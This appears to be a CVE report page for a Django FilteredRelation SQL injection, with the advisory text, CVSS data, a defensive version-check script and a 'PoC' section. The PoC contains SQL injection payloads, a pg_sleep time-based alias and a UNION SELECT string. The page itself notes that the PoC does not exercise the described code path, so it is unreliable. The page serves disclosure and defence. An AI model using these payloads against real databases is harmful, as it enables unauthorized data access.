Security Vulnerability Report
CVE-2025-13372 CVSS 4.3 MEDIUM

CVE-2025-13372

Published: 2025-12-02 16:15:54
Last Modified: 2025-12-12 12:57:24
Source: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

Description

An issue was discovered in Django 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. `FilteredRelation` is subject to SQL injection in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the `**kwargs` passed to `QuerySet.annotate()` or `QuerySet.alias()` on PostgreSQL. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Stackered for reporting this issue.
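Two defensive checks that follow from the description, as an added example that is not part of this report and not Django's own code: a classifier that places an installed Django version in one of the ranges listed above, and a filter that lets only plain-identifier keys through before a caller-supplied mapping is expanded into `annotate(**kwargs)` or `alias(**kwargs)`. The version ranges are those given in the description; the identifier rule and the sample inputs are assumptions of this example. It runs without Django installed.

```python
import re

# Affected ranges from the advisory: (series, first fixed version).
# The series start is inclusive, the fixed version is exclusive.
AFFECTED_RANGES = (
    ((5, 2), (5, 2, 9)),
    ((5, 1), (5, 1, 15)),
    ((4, 2), (4, 2, 27)),
)
# Series the advisory names as "not evaluated"; treat them as possibly affected.
UNEVALUATED_SERIES = ((5, 0), (4, 1), (3, 2))

# Assumed rule for this example: an alias may be forwarded only if it is a
# plain identifier (no quotes, whitespace, semicolons or comment markers).
_IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def parse_version(text):
    """Parse 'X.Y' or 'X.Y.Z' into a 3-tuple of ints.

    A pre-release suffix such as '5.2.9a1' is truncated to its numeric part.
    """
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if m is None:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def assess_version(text):
    """Classify a Django version string against the ranges in the advisory.

    Returns 'vulnerable', 'fixed', 'unevaluated' or 'not_listed'.
    """
    version = parse_version(text)
    for series, fixed in AFFECTED_RANGES:
        if version[:2] == series:
            return "vulnerable" if version < fixed else "fixed"
    if version[:2] in UNEVALUATED_SERIES:
        return "unevaluated"
    return "not_listed"


def safe_annotation_kwargs(untrusted):
    """Split a caller-supplied mapping into (accepted, rejected) before **-expansion.

    Only string keys that match _IDENTIFIER are kept; every other key is
    returned in the rejected list so the caller can log it instead of
    forwarding it to annotate()/alias().
    """
    accepted, rejected = {}, []
    for alias, expression in untrusted.items():
        if isinstance(alias, str) and _IDENTIFIER.match(alias):
            accepted[alias] = expression
        else:
            rejected.append(alias)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed sample inputs, not taken from the advisory.
    for candidate in ("4.2.26", "4.2.27", "5.1.15", "5.2.8", "5.0.3", "6.0"):
        print(f"Django {candidate}: {assess_version(candidate)}")
    requested = {"active_count": "Count('id')", 'x"; --': "Count('id')", "has space": 1}
    ok, bad = safe_annotation_kwargs(requested)
    print("forwarded:", sorted(ok))
    print("rejected:", bad)
```

The version check is the one to run in a dependency audit; the key filter is a belt-and-braces measure for code that builds annotation names from request data, which should be avoided regardless of the Django version in use.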

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE
Django 5.2 < 5.2.9
Django 5.1 < 5.1.15
Django 4.2 < 4.2.27
Django 5.0.x (possibly affected, not officially evaluated)
Django 4.1.x (possibly affected, not officially evaluated)
Django 3.2.x (possibly affected, not officially evaluated)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Note that the script below annotates with `Count('id')` rather than a `FilteredRelation`, so it does not exercise the code path the description names; its `try/except` only reports whatever error the ORM raises for the crafted key.

```python
# CVE-2025-13372 Django FilteredRelation SQL Injection PoC
# Target: Django <= 5.2.8, <= 5.1.14, <= 4.2.26 with PostgreSQL backend

import django
from django.conf import settings

# Configure Django settings
if not settings.configured:
    settings.configure(
        DEBUG=True,
        DATABASES={
            'default': {
                'ENGINE': 'django.db.backends.postgresql',
                'NAME': 'test_db',
                'USER': 'db_user',
                'PASSWORD': 'db_pass',
                'HOST': 'localhost',
                'PORT': '5432',
            }
        },
        INSTALLED_APPS=[
            'django.contrib.contenttypes',
            'django.contrib.auth',
        ],
        USE_TZ=True,
    )
django.setup()

from django.contrib.auth.models import User
# FilteredRelation is exported from django.db.models, not django.db.models.expressions
from django.db.models import Count, FilteredRelation, Q


def exploit_sql_injection():
    """
    Demonstrate SQL injection via FilteredRelation column aliases
    This PoC shows how malicious dictionary keys can inject SQL
    """
    # Malicious key designed to inject SQL in column alias
    # The backslash and quotes can break out of the alias context
    malicious_key = 'status"; SELECT pg_sleep(5);--'

    # Normal usage would be:
    # User.objects.annotate(active_count=Count('id')).values('active_count')

    # Vulnerable code - passing dict with malicious keys as **kwargs
    try:
        # This will generate SQL like:
        # SELECT "status\"; SELECT pg_sleep(5);--" ...
        # which can cause SQL injection
        result = User.objects.annotate(**{malicious_key: Count('id')})
        # Try to trigger query execution
        list(result)
    except Exception as e:
        print(f"Error occurred: {e}")
        print("SQL injection may have been attempted")


def safer_exploit_example():
    """
    More realistic exploitation scenario
    Extract data using UNION-based injection in alias
    """
    # Simulated attack payload for information disclosure
    info_disclosure_payload = 'col UNION SELECT secret FROM django_site--'

    # In vulnerable versions, this could be used to:
    # 1. Extract sensitive data via error-based or blind injection
    # 2. Execute time-based queries for blind injection
    # 3. Potentially modify data if combined with other vulnerabilities
    print(f"Payload: {info_disclosure_payload}")
    print("In vulnerable Django versions, this could lead to:")
    print("1. Unauthorized data access")
    print("2. Database information disclosure")
    print("3. Potential data manipulation")


if __name__ == '__main__':
    print("CVE-2025-13372 Django SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()
    safer_exploit_example()
```

References

https://docs.djangoproject.com/en/dev/releases/security/ (Patch, Vendor Advisory)
https://groups.google.com/g/django-announce (Mailing List, Release Notes)
https://www.djangoproject.com/weblog/2025/dec/02/security-releases/ (Patch, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13372",
    "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
    "published": "2025-12-02T16:15:53.907",
    "lastModified": "2025-12-12T12:57:23.833",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27.\n`FilteredRelation` is subject to SQL injection in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the `**kwargs` passed to `QuerySet.annotate()` or `QuerySet.alias()` on PostgreSQL.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Stackered for reporting this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-89"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.2",
                "versionEndExcluding": "4.2.27",
                "matchCriteriaId": "5208B938-135B-4682-9340-C15B7329ABA6"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.1",
                "versionEndExcluding": "5.1.15",
                "matchCriteriaId": "37B0F07E-F8EA-4DFF-8ED9-C60A79A9ED24"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.2",
                "versionEndExcluding": "5.2.9",
                "matchCriteriaId": "C523418D-ACB5-4E97-9D05-6879B0F48344"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.djangoproject.com/en/dev/releases/security/",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Patch", "Vendor Advisory"]
      },
      {
        "url": "https://groups.google.com/g/django-announce",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Mailing List", "Release Notes"]
      },
      {
        "url": "https://www.djangoproject.com/weblog/2025/dec/02/security-releases/",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}
```